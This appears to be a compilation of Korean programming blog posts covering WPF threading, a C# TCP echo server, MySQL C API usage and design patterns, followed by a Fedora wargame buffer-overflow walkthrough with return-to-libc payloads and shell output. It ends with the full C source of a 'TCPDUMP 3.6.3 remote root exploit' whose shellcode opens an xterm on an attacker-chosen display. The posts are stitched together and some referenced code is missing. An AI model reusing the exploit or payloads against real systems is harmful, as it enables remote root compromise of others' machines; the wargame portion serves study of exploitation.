2012~Lee sang sup`s Note

메인 클래스의 combo box 를 socket 쓰레드에서 받은 메시지들로 채워 주려고 하였다. 

하지만 WPF 에서는 각 UI가 전부 스레드로 동작 된다. 스레드간의 변수 공유는 WPF 에서 기본적으로 막아 놨기 때문에 다른 방법을 써서 이 둘을 이어 줘야 한다. 

우선 singletonepattern 방식을 이용하여 하나의 클래스를 다시 생성해주고, 그 클래스에 combobox 형태의 객체를 static 으로 선언해 주자. 

Singletone.cs

[출처 : http://blog.naver.com/mankeys?Redirect=Log&logNo=138953202 ]

1. TCP Server

using System;

using System.Collections.Generic;

using System.Linq;

using System.Text;

using System.IO;

using System.Net;

using System.Net.Sockets;

namespace ConsoleApplication_TCPEcho01

{

    class TCP_Server

    {

        static void Main(string[] args)

        {

                IPAddress ipAddress = Dns.GetHostEntry("localhost").AddressList[0];

                Console.WriteLine("ipAddress"+ipAddress);

                TcpListener tcp_Listener = new TcpListener(ipAddress, 5555);

                tcp_Listener.Start();

                while (true)

                {

                    Console.WriteLine("1. EchoServer 대기상태.......");

                    TcpClient client = tcp_Listener.AcceptTcpClient();      //클라이언트와 접속

                    Console.WriteLine("2. Echo Client 접속....");

                    NetworkStream ns = client.GetStream();

                    StreamReader reader = new StreamReader(ns);

                    string msg = reader.ReadLine();                     //메시지를 읽어 옴

                    Console.WriteLine("3. [클라이언트 메시지]:" + msg);     //메시지 출력

                    StreamWriter writer = new StreamWriter(ns);

                    writer.WriteLine(msg);                              //네트워크 스트림에 쓰는 듯 함

                    writer.Flush();

                    Console.WriteLine("4. [Echo1]:" + msg);

                    writer.WriteLine(msg);

                    writer.Flush();

                    Console.WriteLine("5. [Echo2]:" + msg);

                    Console.WriteLine("6. 스트림과 TcpClient Close");

                    writer.Close();

                    reader.Close();

                    client.Close();

                }

        }

    }

}

소켓 통신을 할때 서버부분을 Thread 로 따로 돌려주고 메인클래스는 따로 돌리고 싶은 경우에 C# 에서는 thread 를 아주 간단하게 구현하고 메소드를 넣고 실행 할수 있다. 

Thread thrServer;

를 선언해주고, 

thrServer = new Thread(new ThreadStart(ServerClass.ServerRun)); //ServerClass.ServerRun 메소드 이다. 

thrServer.IsBackground = true;  //프로그램이 정상적으로 종료될 수 있다.

 thrServer.Start();

아주 간단한 방법..

WPF로 프로젝트를 하다가 안드로이드의 fill_parents 처럼 화면을 가득 체우게 하는 효과를 주고 싶은 일이 생겼다.

너무 안드로이드에 익숙 한 탓이 였을까? height 와 width 의 값으로 주려고 하거나 코드단에서 처리해야 하는 경우만 생각 했는데, 역시 UI 왕 WPF는 이런 문제를 전체 화면 모드로 제공 해주고 있었다. 

WindowState="Maximized" 로 인하여 전체 화면을 줄수 있고 minimized 도 가능하다. 

hrizontalAlignment 와 verticalAlignment 로 초기 위치를 상위 탑으로 잡아 줄 수도 있다. 

WPF 투명 airo 효과 주기를 위해 opacity를 설정해 주었지만 배경이 그냥 까만색으로 바뀌기만 한다. 

이는 배경과 융화될수 있는 AllowsTransparency 설정이 필요하기 때문이다.

또한 windowStyle 이 none 인 상태만 투명한 효과를 가진다.

어찌나 삽질을 했던지.. 

아래와같이 추가해 주면 된다. 

<Window x:Class="PictureViewer.ExplorerWindow"

    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"

    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"

    xmlns:panels3D="clr-namespace:Visual3DControls;assembly=Visual3DControls" 

    xmlns:pres="clr-namespace:Microsoft.WindowsAPICodePack.Controls.WindowsPresentationFoundation;assembly=Microsoft.WindowsAPICodePack.Shell"

  Title="ExplorerWindow" Height="400" Width="850"

        Background="Black"

        WindowStyle="None"

        AllowsTransparency="True"

        Opacity="0.5"

        Name="aaaa"

        >

우선 WPF 참조에서 microsoft_presentation 을 추가해 줘야 한다.

이후 아래와 같은 코드.. 

출처 : http://blog.naver.com/asloud?Redirect=Log&logNo=10101192728

C 언어로 MySQL 연결하는 방법.

C 언어를 사용하여 MySQL을 연결하는 사용하는 방법을 남겨본다.

Java로는 많이 해보았지만 C 언어로 DB 연결을 해본 경험이 없었다. 그리하여 대강 파악한 방법을 남겨본다.

이렇게 남겨야 나중에 찾아보기라도 하지.

1. 준비

1) MySQL 설치

MySQL을 설치하면 C 개발에 필요한 해더파일들과 라이브러리들도 설치된다.

2) VIsual Studio

환경이 Windows라서 Visual Studio로 개발.

Visual Studio의 프로젝트 생성 후 필요한 해더파일, 라이브러리들을 설정해야 한다.

3) 필요한 해더 파일과 라이브러리들은 MySQL의 설치 경로 아래에 있다.

예를 들어 MySQL의 설치 경로가 "C:\Program Files\MySQL\MySQL Server 5.5" 라면

그 하위 폴더 중 include 폴더에 해더 파일들이 존재

그 하위 폴더 중 lib 폴더에 라이브러리 파일들이 존재

4) Visual Studio 프로젝트 설정

○ 해더파일 추가

[프로젝트] → [속성] 으로 들어간다.

[구성속성] → [C/C++] → [일반]

[추가포함 디렉토리]에 MySQL의 해더파일 디렉토리를 추가

○ 라이브러리 추가

[구성속성] → [링커] → [일반]

[추가 라이브러리 디렉토리]에 라이브러리 디렉토리 추가

○ "libmysql.lib" 설정

[구성속성] → [링커] → [입력]

[추가 종속성]에 "libmysql.lib"을 추가한다

프로젝트 폴더에 "libmysql.dll" 파일을 복사하여야 한다. "libmysql.dll" 파일 없이 실행하면 "libmysql.dll" 파일이 없어 에러가 발생한다.

완성된 프로그램의 실행을 위해서라면 system32 폴더 밑에 "libmysql.dll" 파일을 두어야 한다.

2. API

1) 제일 첫 줄은 [#define SOCKET int] 이어야 한다고 한다.이유는 ws2_32.lib를 추가하는 수고를 덜기 위해서라고 한다.

2) 당연한 이야기이지만 mysql.h 파일을 include해야 한다. 위의 설정을 잘 했다면 my라고만 쳐도 visual studio가 알아서 파일 이름을 찾아줄 것이다.

변수

함수

mysql_init()

- mysql_real_connect() 함수를 위해 MYSQL 객체를 할당 및 초기화

mysql이 NULL이라면 새로운 MYSQL 객체를 할당 및 초기화 하여 반환한다.

- 매개별수

mysql :

- 반환 값 : An initialized MYSQL* handle.

mysql_real_connect()

- host에서 실행중인 MySQL 데이터베이스 엔진에 연결을 설정하려고 시도하는 함수

- 매개변수

mysql : MYSQL 구조체의 포인터

host : 연결하고자 하는 서버의 IP 주소 또는 도메인 이름, NULL이면 localhost를 의미

user : MySQL의 로그인 ID. NULL이거나 빈 문자열이면 현재 로그인한 유저

passwd : user의 패스워드. NULL이면 패스워드가 없다는 뜻

db : 접속하려는 데이터베이스 이름. NULL 이면 기본 데이터베이스를 설정한다

port : 연결시 사용할 포트

unix_socket : unix_socket이 NULL이 아니면, 사용할 소켓이나 파이프 이름을 지정. 보통 NULL로 사용한다

client_flag : 보통 0으로 사용한다. 여러가지 플래그 값을 사용할 수 있다.

- 반환 값 : 연결이 성공하면 MYSQL* connection 핸들을 넘겨준다. 연결 실패면 NULL을 반환

mysql_close()

- 이전에 연 연결을 닫는다

- 매개변수

mysql : 연결을 가지고 있는 핸들

- 반환 값 : 없음

mysql_query()

- 쿼리문을 실행시킨다. 쿼리 문장에는 세미콜론(;)을 포함시키지 않는다.

바이너리 데이터를 포함시켜 사용할 수 없다(바이너리 데이터는 NULL 문자('\0')를 포함할 수 있어서). 대신 mysql_real_query()를 사용하여야 한다.

- 매개변수

mysql : 연결 핸들

stmt_str : 실행할 쿼리 문. 세미 콜론을 포함하지 않는다

- 반환 값 : 성공하면 0을 반환한다

mysql_real_query()

- length 바이트 길이의 쿼리 문장을 실행. 바이너리 데이트를 포함하는 문장 사용 가능

- 매개변수

mysql : 연결 핸들

stmt_str : 실행할 쿼리 문.

length : 쿼리 문장 길이

- 반환 값 : 성공하면 0을 반환한다.

mysql_store_result()

- 쿼리 문 실행 후 결과값을 가져온다. 쿼리 결과의 모든 ROW들를 한번에 얻어 온다

- 반환 값 :

MYSQL_RES : A MYSQL_RES result structure with the results. NULL 이면 실패

mysql_use_result()

- 쿼리 문 실행 후 결과 값을 가져오는 데 mysql_store_result() 함수와는 달리 한 개의 ROW만 가져온다

- 반환 값 :

MYSQL_RES : A MYSQL_RES result structure. NULL 이면 실패

mysql_fetch_row()

- 결과 ROW들을 담은 result에서 다음 ROW를 얻어 온다

- 매개 변수

result : 결과 ROW들을 담고 있는 구조체 포인터

- 반환 값 : 다음 ROW인 MYSQL_ROW 구조체

mysql_free_result()

- mysql_store_result() 함수에 의해 할당된 메모리를 해제한다

- 매개 변수

result : 메모리를 할당할 MYSQL_RES 구조체 포인터

- 반환 값 : 없음

3. 예제 소스 코드

1. 어뎁터 패턴이란?!

어뎁터 패턴은 110v 의 콘센트를 220v 단자에 꼽기위한 노력에서 시작된다고 생각하면 된다. 

아래의 그림을 보자.

이렇게 우리는 110v 를 220v 로 꼽기 위해 돼지코라 불리우는 마법의 소켓을 끼우게 된다.

어댑터 패턴 역시 이러한 마법의 소켓 역할을 하게 도와준다.

간단하게 큰 틀만 보기 위해 아래 그림을 보자.

그림을 보기 힘들다.. 그래 나도 안다. 하지만 제발 한번만 어떤 부분이 무슨 역할을 하는지 보고 다음으로 넘어가자.

우선 110v 라디오와 220v 라디오를 만들자.

T220Radio 플레이어에 220v 라디오를 넣고 동작시키면 잘 돌아가지만, 110v 라디오를 꼽으면 에러가 뜨게 된다.

이러한 110볼트의 콘센트 문제 때문에 우리는 돼지코를 끼워 220v 콘센트로 바꿔야 한다.

다시 돌아가서 만들어진 라디오의 콘센트 모양을 보자 라디오는 11 자형 라디오와  00 모양의 라디오 두가지로 이루어져 있다.

그리고 이 220v (twotwo) 콘센트를 implement 하여 돼지코 어뎁터를 만들고, 그 돼지코 어댑터의 생성자에 110v 라디오 객체를 받아와 조작하여 출력시켜 준다. 

즉 슬롯은 220v인데 110v 단자로 받아 처리하는 것이다. 

느낀점.

어댑터 패턴은 안드로이드 개발을하면서 SQL-lite를 사용할 때 DB접근을 위하여 사용했던 부분이였었다. 처음엔 SQL 쿼리문의 결과값을 그냥 가져와서 쓰지 못할까? 배열로 저장시키면 되지 않을까? 했는데, 이러한 타입형 문제가 존재하기에 불가능 하다.

난 어댑터를 사용하면서 이게 패턴인줄도 모르고 사용하고 있었던 것이다. 

어댑터 패턴은 안드로이드에서는 정말 자주 쓰였던 패턴이므로  코드까지 직접 구현하여 설명을 하였다. 

지금 이 글을 읽는사람이 누구든간에 잘 숙지되었으면 좋겠다. 

hack the planet~! 

winsock 에서 사용하는 함수를 linux 소켓에서 사용하기 

혹시 나처럼 winsock.h 를 어떻게든 리눅스에 올려서 사용할 수 없을까? 를 고민하는 사람이 있다면, "그냥 linux 환경에서 다시짜는게 훨씬 속 편하다" 라는 답을 주고 싶다.

멤버십 과제로 증강현실 온라인 게임을 과제로 할 계획인데, 평소에 winsock2.h 로  소켓통신을 한지라 linux 헤더에 대한 의심을 하기 시작하던 중이다. 

예전에 winsock 공부를 할때 책에 "윈도우 소켓은 리눅스 소켓에서도 조금만 변경하여 사용 할 수 있다 " 라고 하여 그대로 복사 하였다가 수천개의 오류를 검출 했던 기억이 있던 중 indra 형이 아래와 같은 헤더를 던저 주셨다. 

아래의 헤더는 WIN32 환경일 시와 리눅스 환경일 시 어느정도 호환성을 맞춰주는 헤더이다. 

완전 매력!  헤더 원본명은 winlin.h 이고 부작용 없이 소켓을 사용 할수 있는 헤더이다. 

1.프로토타입 패턴이란?! 

프로그램을 오래 하지 않은 사람이라면 객체가 필요할때마다 New 를 생성해서 객체를 생성해 사용 하였을 것이다.

하지만 객체를 생성할때 드는 비용이 컴퓨터 상에서는 만만치 않을 뿐더러, 너무 많은 클래스를 관리하다보면 서브 클래스를 줄이거나, 객체의 형태나 표현방식과는 무관하게 생성 하고 싶을 때가 있다. 

이를 위해 나온 것이 바로 프로토 타입! 이다. 

글씨에 테두리 모양을 넣는 객체를 생성한다고 하자.

우리는 이 글씨에 테두리를 넣을때마다 테두리 객체를 생성하여 넣어줘야 할 것이다. 

하지만 프로토타입 패턴을 이용하면 하나의 객체만을 생성하고 그 객체를 복사하여 쓸수 있다. 

정확한 표현은 아니지만 요런 느낌 이랄까?  NEW 생성자를 호출할 경우 생성자 내의 코드를 전부 재 반복해야 하기 때문에 연산이 많아진다. 하지만 메모리를 복사하여 사용할 경우 그 과정을 줄일 수 있게 된다. 

개발자는 코드로 대화하는게 가장 빠르다고 했던가?! 

아래그림과 같은 프로그램을 짠다고 생각해보자. 단순히 글짜 텍스트에 테두리를 넣어주는 프로그램이다. 

일반적으로 글자 주변에 ~~ 를 만드는 클래스, ****를 만드는 클래스, ///를 만드는 클래스 를 생성해 생성해 주어 각 클래스에 넣거나 많은 메소드(usingStar, usingSlash, using물결 ) 를 사용해서 각각을 호출 할 수 있도록 해 줘야 할 것이다. 하지만 이렇게 만들 경우에는 using 부분에 변경사항이 생겼을 때,수많은 메소드를 전부다 변경 시켜 줘야 하는 유지보수면 문제점이 생긴다. 

이때 이 객체를 하나만 생성하고 쓸때마다 복사해서 쓴다면?

그리고 두개 이상의 다른 객체를 하나의 메소드로 통일하여 사용 할 수 있다면?

Cloneable이라는 복사해주는 기본 클래스를 상속받아서 자신을 복사해주는 Product를 짠다. 

그리고 그때 그때 복사하여 사용해 주면 된다.

아래와 같이 구현  할 것이다. 

MessageBox 에서 Product의 use 추상 메소드를 각각 재정의 해주고, Project 형의 createClone() 메소드를 정의해준다. product 클래스에는 cloneable 클래스가 상속되어 있기 때문에 clone()이라는 메소드를 통해 자신을 복사 할 수 있다. 

우와같이 UnderLinePen 객체와 messageBox의 객체가 다른데도 불과하고 manager.register 를 통하여 각각의 객체를 등록 시켜 준다. 그리고 manager.create 를 하면 각각에 대당하는 객체로 복사를 하는것이다.

즉 다른 두 종류의 객체가 manager 를 통하여 하나로 묶어서 관리하게 된 것이다. 

이러한 프로토 타입의 사용 여부는 다른 디자인 패턴과 연동되어 많이 사용된다.

그 만큼 부작용이 적고 장점으로 뭉쳐 있는 디자인 패턴이다. 

출처 : http://99yurina.blog.me/20156605313 

1. 빌더 패턴이란? 

복잡한 객체를 생성하는 방법과 표현하는 방법을 정의하는 클래스를 별도로 분리하여, 서로다른 표현이라도 이를 생성할 수 있는 동일한 절차를 제공 할 수 있도록 하는 패턴...

이라고~ 사전적 정의가 내려져 있다. 

하지만 나만의 방식대로 말하자면, 다양한 클래스로 생성 해야 할 것들을 하나의 클래스로 한방에 생성 하겠음!  이라고 정의하고 싶다. 물론 여기에는 묶을 수 있는 클래스와 묶을 수 없는 클래스를 구분하는 것은 개발자의 몫이다. 

2. 왜?! 빌더 패턴을 사용하는가? 

우선 피자종류에 대한 프로그램을 짠다고 해보자. 토핑과, 맛, 소스,피클양,페퍼로니,사이즈,치즈크러스터 등등 같은 것을 저장해 줘야 하는데, 이를 한클래스에서 다른이름으로 생성해 주면, 생설할때마다 속성값을 지정해 줘야 하는 불편 함이 있다. 그렇다고 다른 클래스로 생성하여 그것을 미리 설정 해 놓자니, 클래스를 재사용 하기에 불편함이 생긴다.

이 두가지 문제를 해결 하기 위한 것이 빌더 패턴이다.

즉!! 각각의 피자의 속성값을 생성 할때부터 미리 정해 놓을 수 있는데, 같은 객체타입으로 다룰수 있다는 것이다. 

이는 유지보수 면에서 엄청난 매리트다. 

3. 코드 예시 (출처 wikipedia_)

위 그림을 보면, PizzaBuilder 라는 객체를 hawaiian_pizza 와 spicy_pizza 로 각각 생성해 주는데, 이를 new PizzaBuilder 로 선언해 주는 것이 아니라, 그림의 2번 처럼 각각의 hawaiian_pizza 와 spicy_pizza 로 생성한 객체를  각각의 타입이 아닌 pizzaBuilder 타입으로 넣는다!. 

이해를 돕기 위해 PizzaBuilder 추상클래스를 보면, 그림의 1번에서 처럼 pizza 객체를 생성하고, 각각의 메소드를 구현해 놓았다. 그리고 각각의 추상클래스로 builderSource, BuildTopping 등의 추상메소드를 구현해 놓는다.

이제 이러한 PizzaBuilder 를 상속 받아 다양한 피자 객체들을 만들면 PizzaBuilder 에는 이미 피자 객체가 있기 때문에 각각의 속성 값들을 지정해 가지고 있을 수 있다.

이렇게 생성된 다른 객체는 같은 객체로 다뤄질 수 있게 되는 것이다. 

4.느낀점 

 프로그래밍을 오래 한 편이 아니기에 클래스를 선언하고 그 안에 들어가는 객체는 같은 이름의 객체로 생성하는 것만 보았었는데, 저런식으로 타입만 맞추어 다양한 클래스를 집어 넣는 경우를 빌더 패턴을 통해 배운 기분이다. 

Fedora 내부의 환경은 1번 게시글 참조. 

페이로드는 다음과 같다.

다음은 strace를 이용한 값을 오류로서 result 에 저장한다. 

[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xfe\x82\x04\x08"x2,"\x91\x54\x7a"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa˜ùãþþþ‘Tz

sh-3.00$ id

uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you

sh-3.00$

RedHat -> Fedora 로 넘어오면서 바뀌어진 환경

기존에 LOB RedHat 원정대의 경우는 쉘코드를 많이 활용 했었지만, 페도라원정대에서는 RTL 기법을 최대한 활용 하는 방향으로 가야 편하다. 

아래는 페도라의 수문장인 iron_golem 이다. 

정말 다시 돌아온 것같은 느낌의 쉬운 코드.. 간단하게 return adress 의 주소값을 바꿀 수 있는 구조이다. 

페이로드를 그려보면 다음과 같다. 

[buffer = 264 ] [sfp =4 ] [ret =4] [argc =4 ][argv =4 ] 

RET 주소가 bbbb 로 싀워진것을 확인 할 수 있다. 

다음은 RTL 에 쓸 system() 함수의 시작 주소값을 알아 보자.

우선 기본 RTL 공격 페이로드를 봐보자 

그리고 system 함수를 RET에 넣고 시작하여 인자로 쓸 부분을 확인해 보자. 

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9ÛôþFÛôþ: command not found

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9»öþF»öþ: command not found

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9kôþFkôþ: command not found

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$

무언가가 실행 된 것을 볼 수 있으나 지정된 프로그램이나 명령어가 아니므로 command not found 가 뜨고 있다. 

그리고 그 값이 계속 변한다. 이유인 즉 아직 system 함수의 인자로 쓸 값이 Random 한 스택영역에 있기 때문이다.

우리는 이를 해결하기 위해서 스택 영역을 벗어나야 한다. 

그 중 한 방법으로 ret 의 값으로 다시 ret 주소를 넣고, 그 ret주소에는 다시 ret 주소를 넣는 방식을 사용하여 eip를 계속 올려내는 방법이 있다. 

그방법을 써서 고정된 영역으로 인자값을 옴겨 보도록 하겠다.

GDB 의 disass 를 통하여 RET 의 주소값은 0x08048441 이라는 것을 알 수 있고, 이를 이용하여 위에 설명 했던 방식으로 

페이로드를 짜보자.d

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu

sh: ‹Uðƒì‰Á1À…Òt                      eô[^_]ËMè‹@·H‹Žˆ: command not found

Segmentation fault (core dumped)ÿu‹Mä‰

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu

sh: ‹Uðƒì‰Á1À…Òt                      eô[^_]ËMè‹@·H‹Žˆ: command not found

Segmentation fault (core dumped)ÿu‹Mä‰

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

보면 RET을 두번만 호출 하였는데도 같은 값이 출력 됨을 확인 할 수 있다. 

이녀석들을 전부다 인자로 만들어줘야 하나 이는 너무 길어보이므로 3번 더 RET을 덮어 보겠다. 

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$

/*

 * TCPDUMP 3.6.3 remote root exploit 

 *

 * tested against FreeBSD-4.6

 *

 * By: icesk

 *

 * Greets: meenor, optik, scsiu, stanly

 * flames: ezoons (homo)

 */

#include <stdio.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netdb.h>

#include <arpa/inet.h>

#define ADDR0xbffff248

#define OFFSET 0

#define NUM_ADDR  10

#define NOP 0x90

#define NUM_NOP100

#define RX_CLIENT_INITIATED  1

#define RX_PACKET_TYPE_DATA  1

#define FS_RX_DPORT 7000

#define FS_RX_SPORT 7001

#define AFS_CALL 134

struct rx_header {

  u_int32_t epoch;

  u_int32_t cid;

  u_int32_t callNumber;

  u_int32_t seq;

  u_int32_t serial;

  u_char type;

  u_char flags;

  u_char userStatus;

  u_char securityIndex;

  u_short spare;

  u_short serviceId;

};

char shellcode[] = 

  "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"

  "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"

  "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"

  "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"

  "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"

  "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"

  "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"

  "\xff\xff\xff"

  "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

long resolve(char *name)

{

  struct hostent *hp;

  long ip;

  if ((ip=inet_addr(name))==-1) {

    if ((hp=gethostbyname(name))==NULL) {

      fprintf (stderr,"Can't resolve host name [%s].\n",name);

      exit(-1);

    }

    memcpy(&ip,(hp->h_addr),4);

  }

  return(ip);

}

int

main(int argc, char *argv[])

{

  struct sockaddr_in addr,sin;

  int sock,aux, offset=OFFSET;

  char buffer[4048], *chptr;

  struct rx_header *rxh;

  long int *lptr, return_addr=ADDR;

  fprintf(stderr, "Tcpdump 3.6.3 remote exploit against FreeBSD 4.6\n\n");

  if (argc<3) {

    printf("Usage: %s [host] [display] [offset]\n",argv[0]);

    exit(-1);

  }

  if (argc==4) offset=atoi(argv[3]);

  return_addr+=offset;

  fprintf(stderr,"Using return addr: %#x\n",return_addr);

  addr.sin_family=AF_INET;

  addr.sin_addr.s_addr=resolve(argv[1]);

  addr.sin_port=htons(FS_RX_DPORT);

  if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {

    perror("socket()");

    exit(-1);

  }

  sin.sin_family=AF_INET;

  sin.sin_addr.s_addr=INADDR_ANY;

  sin.sin_port=htons(FS_RX_SPORT);

  if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {

    perror("bind()");

    exit(-1);

  }

  memset(buffer,0,sizeof(buffer));

  rxh=(struct rx_header *)buffer;

  rxh->type=RX_PACKET_TYPE_DATA;

  rxh->seq=htonl(1);

  rxh->flags=RX_CLIENT_INITIATED;

  lptr=(long int *)(buffer+sizeof(struct rx_header));

  *(lptr++)=htonl(AFS_CALL);

  *(lptr++)=htonl(1);

  *(lptr++)=htonl(2);

  *(lptr++)=htonl(3);

  *(lptr++)=htonl(420);

  chptr=(char *)lptr;

  sprintf(chptr,"1 0\n");

  chptr+=4;

  memset(chptr,'A',120);

  chptr+=120;

  lptr=(long int *)chptr;

  for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;

  chptr=(char *)lptr;

  memset(chptr,NOP,NUM_NOP);

  chptr+=NUM_NOP;

  shellcode[30]=(char)(46+strlen(argv[2]));

  memcpy(chptr,shellcode,strlen(shellcode));

  chptr+=strlen(shellcode);

  memcpy(chptr,argv[2],strlen(argv[2]));

  chptr+=strlen(argv[2]);

  sprintf(chptr," 1\n");

  if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)

  {

    perror("send()");

    exit(-1);

  }

  fprintf(stderr,"Packet Sent Waiting For Xterm!!!\n\n");

  close(sock);

  return(0);

}

/*           _ ________            _____                        ______

    __ ___ ____       /____.------`    /_______.------.___.----`  ___/____ _______

         _/    \ _   /\   __.  __//   ___/_    ___.  /_\    /_    |     _/

